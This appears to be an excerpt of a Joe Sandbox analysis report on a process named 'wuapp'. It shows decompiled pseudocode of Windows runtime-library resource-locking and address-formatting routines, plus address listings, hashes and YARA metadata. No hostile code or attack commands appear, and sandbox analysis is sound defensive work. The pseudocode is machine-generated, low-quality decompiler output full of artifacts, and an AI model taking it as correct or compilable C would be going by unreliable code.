                                                          C-Code - Quality: 49%
                                                          			E01FA0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020401c0;
									_push(_t144);
									_push(0);
									_t51 = E01F5F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01FA4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01FB3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FE217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FB3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01FA3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020401c0;
												_push(_t138);
												_push(0);
												_t58 = E01F5F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01FA4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01FB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FE217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01FB3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01FA3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F85384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F5F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01FA3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F5F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01FA3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F5F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01FA3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E01F85329(_t110, _t138);
																return E01F853A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                          0x01fa055a
                                                          0x01fa055d
                                                          0x01fa0563
                                                          0x01fa0566
                                                          0x01fa05d8
                                                          0x01fa05e2
                                                          0x01fa05e5
                                                          0x00000000
                                                          0x01fa05e7
                                                          0x01fa05e7
                                                          0x01fa05ea
                                                          0x01fa05f3
                                                          0x01fa05f3
                                                          0x01fa0568
                                                          0x01fa0568
                                                          0x01fa0568
                                                          0x01fa0569
                                                          0x01fa0569
                                                          0x01fa0569
                                                          0x01fa056b
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc217f
                                                          0x01fc2183
                                                          0x01fc225b
                                                          0x01fc225f
                                                          0x01fc2189
                                                          0x01fc218c
                                                          0x01fc218f
                                                          0x01fc2194
                                                          0x01fc2199
                                                          0x01fc219d
                                                          0x01fc21a0
                                                          0x01fc21a2
                                                          0x01fc21ce
                                                          0x01fc21ce
                                                          0x01fc21ce
                                                          0x01fc21d0
                                                          0x01fc21d6
                                                          0x01fc21de
                                                          0x01fc21e2
                                                          0x01fc21e8
                                                          0x01fc21e9
                                                          0x01fc21ec
                                                          0x01fc21f1
                                                          0x01fc21f6
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21f8
                                                          0x01fc21fb
                                                          0x01fc2206
                                                          0x01fc220b
                                                          0x01fc220c
                                                          0x01fc2217
                                                          0x01fc2226
                                                          0x01fc222b
                                                          0x01fc222c
                                                          0x01fc222f
                                                          0x01fc2232
                                                          0x01fc2235
                                                          0x01fc2235
                                                          0x01fc223a
                                                          0x01fc223f
                                                          0x01fc2241
                                                          0x01fc2243
                                                          0x01fc2248
                                                          0x01fc2248
                                                          0x01fc224d
                                                          0x01fc224f
                                                          0x01fc2262
                                                          0x01fc2263
                                                          0x01fc2268
                                                          0x01fc2269
                                                          0x01fc2269
                                                          0x01fc2269
                                                          0x01fc226d
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc2276
                                                          0x01fc2279
                                                          0x01fc227e
                                                          0x01fc2283
                                                          0x01fc2287
                                                          0x01fc228a
                                                          0x01fc228d
                                                          0x01fc228f
                                                          0x01fc22bc
                                                          0x01fc22bc
                                                          0x01fc22bc
                                                          0x01fc22be
                                                          0x01fc22c4
                                                          0x01fc22cc
                                                          0x01fc22d0
                                                          0x01fc22d6
                                                          0x01fc22d7
                                                          0x01fc22da
                                                          0x01fc22df
                                                          0x01fc22e4
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22e6
                                                          0x01fc22e9
                                                          0x01fc22f4
                                                          0x01fc22f9
                                                          0x01fc22fa
                                                          0x01fc2305
                                                          0x01fc2314
                                                          0x01fc2319
                                                          0x01fc231a
                                                          0x01fc231d
                                                          0x01fc2320
                                                          0x01fc2323
                                                          0x01fc2323
                                                          0x01fc2328
                                                          0x01fc232d
                                                          0x01fc232f
                                                          0x01fc2331
                                                          0x01fc2336
                                                          0x01fc2336
                                                          0x01fc233b
                                                          0x01fc233d
                                                          0x01fc2350
                                                          0x01fc2351
                                                          0x01fc2356
                                                          0x01fc2359
                                                          0x01fc2359
                                                          0x01fc235b
                                                          0x01fc235d
                                                          0x01f85367
                                                          0x01f8536b
                                                          0x01f85372
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc2363
                                                          0x01fc2363
                                                          0x01fc2369
                                                          0x01fc236a
                                                          0x01fc236c
                                                          0x01fc2371
                                                          0x01fc2373
                                                          0x00000000
                                                          0x01fc2379
                                                          0x01fc2379
                                                          0x01fc237a
                                                          0x01fc237f
                                                          0x01fc237f
                                                          0x01fc2385
                                                          0x01fc2386
                                                          0x01fc2389
                                                          0x01fc238e
                                                          0x01fc2390
                                                          0x01f85378
                                                          0x01f8537c
                                                          0x01fc2396
                                                          0x01fc2396
                                                          0x01fc2397
                                                          0x01fc239c
                                                          0x01fc23a2
                                                          0x01fc23a3
                                                          0x01fc23a6
                                                          0x01fc23ab
                                                          0x01fc23ad
                                                          0x00000000
                                                          0x01fc23b3
                                                          0x01fc23b3
                                                          0x01fc23b4
                                                          0x01fc23b9
                                                          0x01fc23ba
                                                          0x01fc23ba
                                                          0x01fc23bc
                                                          0x01fc23bf
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb9153
                                                          0x01fb9158
                                                          0x01fb915a
                                                          0x01fb915e
                                                          0x01fb9160
                                                          0x00000000
                                                          0x01fb9166
                                                          0x01fb9166
                                                          0x01fb9171
                                                          0x01fb9176
                                                          0x01fb9176
                                                          0x00000000
                                                          0x01fb9160
                                                          0x01fc23c6
                                                          0x01fc23d7
                                                          0x01fc23d7
                                                          0x01fc23ad
                                                          0x01fc2390
                                                          0x01fc2373
                                                          0x01fc233f
                                                          0x01fc233f
                                                          0x00000000
                                                          0x01fc233f
                                                          0x01fc2291
                                                          0x01fc2291
                                                          0x01fc2293
                                                          0x01fc2295
                                                          0x01fc229a
                                                          0x01fc22a1
                                                          0x01fc22a3
                                                          0x01fc22a7
                                                          0x01fc22a9
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22ab
                                                          0x01fc22ad
                                                          0x01fc22af
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22af
                                                          0x01fc22b1
                                                          0x01fc22b4
                                                          0x01fc22b4
                                                          0x01fc22b6
                                                          0x01f853be
                                                          0x01f853be
                                                          0x01f853be
                                                          0x01f853c0
                                                          0x00000000
                                                          0x00000000
                                                          0x01f853cb
                                                          0x01f853ce
                                                          0x01f853d0
                                                          0x01f853d4
                                                          0x01f853d6
                                                          0x00000000
                                                          0x01f853d8
                                                          0x01f853e3
                                                          0x01f853ea
                                                          0x01f853ea
                                                          0x00000000
                                                          0x01f853d6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22b6
                                                          0x00000000
                                                          0x01fc228f
                                                          0x01fc2349
                                                          0x01fc234d
                                                          0x01fc2251
                                                          0x01fc2251
                                                          0x00000000
                                                          0x01fc2251
                                                          0x01fc21a4
                                                          0x01fc21a4
                                                          0x01fc21a6
                                                          0x01fc21a8
                                                          0x01fc21ac
                                                          0x01fc21b6
                                                          0x01fc21b8
                                                          0x01fc21bc
                                                          0x01fc21be
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c0
                                                          0x01fc21c2
                                                          0x01fc21c4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c4
                                                          0x01fc21c6
                                                          0x01fc21c6
                                                          0x01fc21c8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc21c8
                                                          0x01fc21a2
                                                          0x00000000
                                                          0x01fc2183
                                                          0x01fa057b
                                                          0x01fa057d
                                                          0x01fa0581
                                                          0x01fa0583
                                                          0x01fc2178
                                                          0x00000000
                                                          0x01fa0589
                                                          0x01fa058f
                                                          0x01fa058f
                                                          0x01fa0583
                                                          0x00000000

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FC2206
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-4236105082
                                                          • Opcode ID: 1e2e7d757e5b11ed411a9cd0ff9cf84e15ee161c27fe81a806d824c5b69fb30c
                                                          • Instruction ID: 9c8f93b25f2c4916d04f159ba442ec2477f313aa36a488d5760fb75cdb6555bd
                                                          • Opcode Fuzzy Hash: 1e2e7d757e5b11ed411a9cd0ff9cf84e15ee161c27fe81a806d824c5b69fb30c
                                                          • Instruction Fuzzy Hash: A7511875B40203AFEB15DA19DCC0FA633AAEBD4B10F25421DFD45DB285DA27E8428790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01FA14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E01FA14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2042088; // 0x768eee31
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01F97707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01FA13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01F97707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01F97707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01F62340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01F6E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                          0x01fa14c0
                                                          0x01fa14cb
                                                          0x01fa14d2
                                                          0x01fa14d6
                                                          0x01fa14da
                                                          0x01fa14de
                                                          0x01fa14e3
                                                          0x01fa157a
                                                          0x01fa157a
                                                          0x01fa14f1
                                                          0x01fa14f3
                                                          0x01fcea0f
                                                          0x00000000
                                                          0x01fcea15
                                                          0x00000000
                                                          0x01fcea15
                                                          0x01fa14f9
                                                          0x01fa14f9
                                                          0x01fa14fe
                                                          0x01fa1504
                                                          0x01fcea1a
                                                          0x01fcea1f
                                                          0x01fcea21
                                                          0x01fcea22
                                                          0x01fcea27
                                                          0x01fcea2a
                                                          0x01fcea2a
                                                          0x01fa1515
                                                          0x01fa1517
                                                          0x01fa156d
                                                          0x01fa1572
                                                          0x01fa1575
                                                          0x01fa1575
                                                          0x01fa151e
                                                          0x01fcea50
                                                          0x01fcea55
                                                          0x01fcea58
                                                          0x01fcea58
                                                          0x01fa152e
                                                          0x01fa1531
                                                          0x01fa1533
                                                          0x00000000
                                                          0x01fa1535
                                                          0x01fa1541
                                                          0x01fa1549
                                                          0x01fa1549
                                                          0x01fa1533
                                                          0x01fa14f3
                                                          0x01fa1559

                                                          APIs
                                                          • ___swprintf_l.LIBCMT ref: 01FCEA22
                                                            • Part of subcall function 01FA13CB: ___swprintf_l.LIBCMT ref: 01FA146B
                                                            • Part of subcall function 01FA13CB: ___swprintf_l.LIBCMT ref: 01FA1490
                                                          • ___swprintf_l.LIBCMT ref: 01FA156D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 1c4e4949140c87d54a2de4962470065201e5d04e8770c7bb0b51d6fd9796a3f5
                                                          • Instruction ID: 05003e0d1a4053648169921aa245d60a1d44ab866ea41c15444b68aeb939dd14
                                                          • Opcode Fuzzy Hash: 1c4e4949140c87d54a2de4962470065201e5d04e8770c7bb0b51d6fd9796a3f5
                                                          • Instruction Fuzzy Hash: 4321D6B2D0021ADFDB21EE58CC00AEE77BCBB60710F894515ED86D3100DB76EA588BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E01F853A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020401c0;
									_push(_t92);
									_push(0);
									_t37 = E01F5F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01FA4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01FB3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01FB3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01FE217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01FB3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01FA3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F85384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01F5F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01FA3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01F5F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01FA3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01F5F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01FA3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E01F85329(_t74, _t92);
													_push(1);
													return E01F853A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                          0x01f853ab
                                                          0x01f853ae
                                                          0x01f853b1
                                                          0x01f853b4
                                                          0x01f853b7
                                                          0x01fa05b6
                                                          0x01fa05c0
                                                          0x01fa05c3
                                                          0x00000000
                                                          0x01fa05c9
                                                          0x01fa05c9
                                                          0x01fa05cc
                                                          0x01fa05d5
                                                          0x01fa05d5
                                                          0x01f853bd
                                                          0x01f853bd
                                                          0x01f853bd
                                                          0x01f853be
                                                          0x01f853be
                                                          0x01f853be
                                                          0x01f853c0
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc2269
                                                          0x01fc226d
                                                          0x01fc2349
                                                          0x01fc234d
                                                          0x01fc2273
                                                          0x01fc2276
                                                          0x01fc2279
                                                          0x01fc227e
                                                          0x01fc2283
                                                          0x01fc2287
                                                          0x01fc228a
                                                          0x01fc228d
                                                          0x01fc228f
                                                          0x01fc22bc
                                                          0x01fc22bc
                                                          0x01fc22bc
                                                          0x01fc22be
                                                          0x01fc22c4
                                                          0x01fc22cc
                                                          0x01fc22d0
                                                          0x01fc22d6
                                                          0x01fc22d7
                                                          0x01fc22da
                                                          0x01fc22df
                                                          0x01fc22e4
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22e6
                                                          0x01fc22e9
                                                          0x01fc22f4
                                                          0x01fc22f9
                                                          0x01fc22fa
                                                          0x01fc2305
                                                          0x01fc2314
                                                          0x01fc2319
                                                          0x01fc231a
                                                          0x01fc231d
                                                          0x01fc2320
                                                          0x01fc2323
                                                          0x01fc2323
                                                          0x01fc2328
                                                          0x01fc232d
                                                          0x01fc232f
                                                          0x01fc2331
                                                          0x01fc2336
                                                          0x01fc2336
                                                          0x01fc233b
                                                          0x01fc233d
                                                          0x01fc2350
                                                          0x01fc2351
                                                          0x01fc2356
                                                          0x01fc2359
                                                          0x01fc2359
                                                          0x01fc235b
                                                          0x01fc235d
                                                          0x01f85367
